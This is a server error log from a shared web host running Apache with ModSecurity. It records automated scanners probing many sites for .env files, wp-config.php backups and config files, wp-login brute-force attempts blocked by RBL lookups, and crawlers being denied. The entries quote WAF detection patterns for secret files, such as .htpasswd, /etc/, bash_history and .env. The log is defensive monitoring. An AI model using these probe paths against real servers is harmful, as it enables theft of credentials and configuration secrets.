[Tue May 26 15:36:51.183637 2026] [core:error] [pid 724639:tid 724764] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:51.493789 2026] [core:error] [pid 724639:tid 724766] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:51.493824 2026] [core:error] [pid 724639:tid 724766] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:51.821435 2026] [core:error] [pid 724639:tid 724693] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:51.821462 2026] [core:error] [pid 724639:tid 724693] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:52.122870 2026] [core:error] [pid 724639:tid 724763] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:52.122921 2026] [core:error] [pid 724639:tid 724763] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:52.404488 2026] [core:error] [pid 724639:tid 724702] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:52.404518 2026] [core:error] [pid 724639:tid 724702] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:52.471321 2026] [security2:error] [pid 724639:tid 724886] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwvBKJRbiNp3eWdT2LqQAAAPo"]
[Tue May 26 15:36:52.659089 2026] [core:error] [pid 724639:tid 724703] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:52.659107 2026] [core:error] [pid 724639:tid 724703] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:52.705341 2026] [security2:error] [pid 724639:tid 724807] [client 47.128.47.107:56664] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/en/k2/user/content/135-blogs"] [unique_id "ahVwvBKJRbiNp3eWdT2LuwAAAKs"]
[Tue May 26 15:36:52.903296 2026] [core:error] [pid 724639:tid 724717] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:52.903329 2026] [core:error] [pid 724639:tid 724717] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:36:53.145054 2026] [security2:error] [pid 724639:tid 724701] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.visnagar.ucdc.co.in"] [uri "/.env.backup"] [unique_id "ahVwvRKJRbiNp3eWdT2LyAAAlz0"]
[Tue May 26 15:36:53.378527 2026] [security2:error] [pid 724639:tid 724771] [client 103.148.115.136:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwvBKJRbiNp3eWdT2LxQAAAIc"]
[Tue May 26 15:36:53.438514 2026] [security2:error] [pid 724639:tid 724727] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.visnagar.ucdc.co.in"] [uri "/.env.old"] [unique_id "ahVwvRKJRbiNp3eWdT2L2QAAtVc"]
[Tue May 26 15:36:53.575221 2026] [security2:error] [pid 724639:tid 724836] [client 176.65.139.233:58002] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.fonefix.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVwvRKJRbiNp3eWdT2L2wAAAMg"]
[Tue May 26 15:36:53.704544 2026] [security2:error] [pid 724639:tid 724643] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.visnagar.ucdc.co.in"] [uri "/.env.bak"] [unique_id "ahVwvRKJRbiNp3eWdT2L3wAAhQM"]
[Tue May 26 15:36:54.008114 2026] [security2:error] [pid 724639:tid 724730] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.visnagar.ucdc.co.in"] [uri "/config/.env"] [unique_id "ahVwvhKJRbiNp3eWdT2L5QAAmFo"]
[Tue May 26 15:36:54.033071 2026] [security2:error] [pid 724639:tid 724821] [client 223.123.38.127:15198] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVwvRKJRbiNp3eWdT2L3QAAALk"]
[Tue May 26 15:36:54.033199 2026] [security2:error] [pid 724639:tid 724821] [client 223.123.38.127:15198] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVwvRKJRbiNp3eWdT2L3QAAALk"]
[Tue May 26 15:36:54.256100 2026] [security2:error] [pid 724639:tid 724782] [client 176.65.139.234:65492] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.masonicarkfoundation.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVwvhKJRbiNp3eWdT2L7wAAAJI"]
[Tue May 26 15:36:54.341180 2026] [security2:error] [pid 724639:tid 724688] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.visnagar.ucdc.co.in"] [uri "/app/.env"] [unique_id "ahVwvhKJRbiNp3eWdT2L8wAAvzA"]
[Tue May 26 15:36:54.623462 2026] [security2:error] [pid 724639:tid 724713] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.visnagar.ucdc.co.in"] [uri "/src/.env"] [unique_id "ahVwvhKJRbiNp3eWdT2MAQAA9kk"]
[Tue May 26 15:36:54.934935 2026] [security2:error] [pid 724639:tid 724705] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.visnagar.ucdc.co.in"] [uri "/backend/.env"] [unique_id "ahVwvhKJRbiNp3eWdT2MCwABAkE"]
[Tue May 26 15:36:54.940378 2026] [security2:error] [pid 724639:tid 724805] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwvhKJRbiNp3eWdT2L_gAAAKk"]
[Tue May 26 15:36:55.233105 2026] [security2:error] [pid 724639:tid 724851] [client 195.178.110.34:44548] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cpanel.d2cargo.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVwvxKJRbiNp3eWdT2MEgAAANc"]
[Tue May 26 15:36:55.329539 2026] [security2:error] [pid 724639:tid 724704] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.visnagar.ucdc.co.in"] [uri "/api/.env"] [unique_id "ahVwvxKJRbiNp3eWdT2MEwAAqkA"]
[Tue May 26 15:36:55.468569 2026] [security2:error] [pid 724639:tid 724818] [client 176.65.139.229:30868] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gciamd.org.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVwvxKJRbiNp3eWdT2MFwAAALY"]
[Tue May 26 15:36:55.688168 2026] [security2:error] [pid 724639:tid 724710] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.visnagar.ucdc.co.in"] [uri "/config.php"] [unique_id "ahVwvxKJRbiNp3eWdT2MGwAAhUY"]
[Tue May 26 15:36:55.960402 2026] [security2:error] [pid 724639:tid 724720] [remote 164.138.208.104:47504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.208.138.164.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kurgu-afrika.com"] [uri "/wp-login.php"] [unique_id "ahVwvxKJRbiNp3eWdT2MHAAAulA"]
[Tue May 26 15:36:56.105752 2026] [security2:error] [pid 724639:tid 724838] [client 176.65.139.229:30876] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.rathnaa.co.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahVwwBKJRbiNp3eWdT2MJgAAAMo"]
[Tue May 26 15:36:56.548652 2026] [security2:error] [pid 724639:tid 724721] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.visnagar.ucdc.co.in"] [uri "/settings.php"] [unique_id "ahVwwBKJRbiNp3eWdT2MNwAA7FE"]
[Tue May 26 15:36:56.776705 2026] [security2:error] [pid 724639:tid 724808] [client 85.208.96.201:30728] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-29-august-2/day/2023-10-31/"] [unique_id "ahVwwBKJRbiNp3eWdT2MRQAAAKw"]
[Tue May 26 15:36:56.776859 2026] [security2:error] [pid 724639:tid 724808] [client 85.208.96.201:30728] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/july-29-august-2/day/2023-10-31/"] [unique_id "ahVwwBKJRbiNp3eWdT2MRQAAAKw"]
[Tue May 26 15:36:57.065474 2026] [security2:error] [pid 724639:tid 724773] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwwBKJRbiNp3eWdT2MQAAAAIk"]
[Tue May 26 15:36:57.715135 2026] [security2:error] [pid 724639:tid 724825] [client 176.65.139.236:36974] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rathnaa.co.in"] [uri "/.env"] [unique_id "ahVwwRKJRbiNp3eWdT2MaQAAAL0"]
[Tue May 26 15:36:57.715660 2026] [security2:error] [pid 724639:tid 724770] [client 176.65.139.232:48426] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "masonicarkfoundation.in"] [uri "/.env"] [unique_id "ahVwwRKJRbiNp3eWdT2MaAAAAIY"]
[Tue May 26 15:36:57.748018 2026] [security2:error] [pid 724639:tid 724752] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.visnagar.ucdc.co.in"] [uri "/wp-config.php"] [unique_id "ahVwwRKJRbiNp3eWdT2MagAAsHA"]
[Tue May 26 15:36:57.751070 2026] [security2:error] [pid 724639:tid 724796] [client 176.65.139.239:38356] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "fonefix.in"] [uri "/.env"] [unique_id "ahVwwRKJRbiNp3eWdT2MawAAAKA"]
[Tue May 26 15:36:57.803414 2026] [security2:error] [pid 724639:tid 724781] [client 176.65.139.231:25196] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "gciamd.org.in"] [uri "/.env"] [unique_id "ahVwwRKJRbiNp3eWdT2MbwAAAJE"]
[Tue May 26 15:36:58.351015 2026] [security2:error] [pid 724639:tid 724754] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.visnagar.ucdc.co.in"] [uri "/config.php.bak"] [unique_id "ahVwwhKJRbiNp3eWdT2MhgAA-XI"]
[Tue May 26 15:36:58.957485 2026] [security2:error] [pid 724639:tid 724640] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.visnagar.ucdc.co.in"] [uri "/wp-config.php.backup"] [unique_id "ahVwwhKJRbiNp3eWdT2MnAAAsAA"]
[Tue May 26 15:36:59.508345 2026] [security2:error] [pid 724639:tid 724875] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwwxKJRbiNp3eWdT2MowAAAO8"]
[Tue May 26 15:36:59.552016 2026] [security2:error] [pid 724639:tid 724758] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.visnagar.ucdc.co.in"] [uri "/wp-config.php.bak"] [unique_id "ahVwwxKJRbiNp3eWdT2MtQAA6XY"]
[Tue May 26 15:37:00.426899 2026] [security2:error] [pid 724639:tid 724825] [client 62.60.130.233:51195] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "amdsi.org.in"] [uri "/wp-login.php"] [unique_id "ahVwxBKJRbiNp3eWdT2M2wAAAL0"], referer: https://wordpress.org/
[Tue May 26 15:37:00.445155 2026] [security2:error] [pid 724639:tid 724725] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.visnagar.ucdc.co.in"] [uri "/wp-config.php.old"] [unique_id "ahVwxBKJRbiNp3eWdT2M3AAAtFU"]
[Tue May 26 15:37:00.768488 2026] [security2:error] [pid 724639:tid 724855] [client 62.60.130.233:64480] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.130.60.62.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "amdsi.org.in"] [uri "/wp-login.php"] [unique_id "ahVwxBKJRbiNp3eWdT2M6gAAANs"], referer: https://www.google.fr/search?q=wordpress
[Tue May 26 15:37:01.178167 2026] [security2:error] [pid 724639:tid 724870] [client 5.183.130.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVwxRKJRbiNp3eWdT2M-AAAAOo"], referer: http://anujtradingco.com/
[Tue May 26 15:37:01.228176 2026] [security2:error] [pid 724639:tid 724661] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.visnagar.ucdc.co.in"] [uri "/wp-config.php.save"] [unique_id "ahVwxRKJRbiNp3eWdT2NBQAA3hU"]
[Tue May 26 15:37:01.919819 2026] [security2:error] [pid 724639:tid 724889] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwxRKJRbiNp3eWdT2NFgAAAP0"]
[Tue May 26 15:37:02.004521 2026] [security2:error] [pid 724639:tid 724663] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.visnagar.ucdc.co.in"] [uri "/wp-config.php.swp"] [unique_id "ahVwxhKJRbiNp3eWdT2NLAAApxc"]
[Tue May 26 15:37:02.699737 2026] [security2:error] [pid 724639:tid 724646] [remote 45.148.10.5:26592] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.visnagar.ucdc.co.in"] [uri "/wp-config.php.txt"] [unique_id "ahVwxhKJRbiNp3eWdT2NRgAA7QY"]
[Tue May 26 15:37:03.399700 2026] [security2:error] [pid 724639:tid 724789] [client 223.123.38.127:15199] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.38.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVwxxKJRbiNp3eWdT2NYQAAAJk"]
[Tue May 26 15:37:03.399895 2026] [security2:error] [pid 724639:tid 724789] [client 223.123.38.127:15199] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVwxxKJRbiNp3eWdT2NYQAAAJk"]
[Tue May 26 15:37:04.226205 2026] [core:error] [pid 724639:tid 724690] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 15:37:04.226226 2026] [core:error] [pid 724639:tid 724690] [remote 45.148.10.5:26592] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
